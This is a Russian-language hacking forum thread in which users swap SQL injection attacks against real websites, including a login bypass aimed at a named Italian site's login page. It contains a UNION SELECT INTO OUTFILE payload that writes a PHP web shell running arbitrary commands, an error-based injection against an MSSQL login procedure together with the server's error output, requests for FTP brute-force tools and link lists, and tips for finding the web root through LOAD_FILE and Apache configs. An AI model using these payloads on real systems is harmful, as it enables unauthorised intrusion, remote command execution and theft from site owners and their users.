Почему-то не получается. так и так пробовал.
http://www.nuovemozioni.com/login.asp

ник') or 1=1--(пробел)

может не в тему чуток..но всё таки..чем напарсить линки для брута фтп?
да и Брутусае2 залейте...а то удалил его..

Где можно почитать про заливку шелла через SQL Inj ?
конкретно про это не нашёл подходящих статей(

union select 1,<? system($_GET[cmd]); ?>,3 from users into outfile '/www/site/temp/shell.php'/*

p.s: https://forum.antichat.ru/showthread.php?t=34338

Login: ' or 1=(@@version)--
Pwd: qwerty

exec et_CustomerLOGIN 'CE2381685624496CAE568A1C9FF9F951', '' or 1=(@@version)--', 'qwery'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.

Вот часть запроса выудил. Как можно сформировать запрос чтоб получить результат?

SHS попробуй войти вод админом )

столкнулся с проблемой, делаю union select into outfile '1.txt' оно его сохраняет в папку var/db/mysql/ но это на уровень выше чем то где находится сам сайт, короче вот так http://aaa.ru/1.txt на него не зайдеш он где то ближе лежит, вопрос как узнать где лежит сайт? там можно без полного пути, начиная с var/

InvisibleSM,
а) иногда помогает LOAD_FILE('/') - оно выведет листинг корня и т.п.
б) почитать конфиги апача в стандартных местах

__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ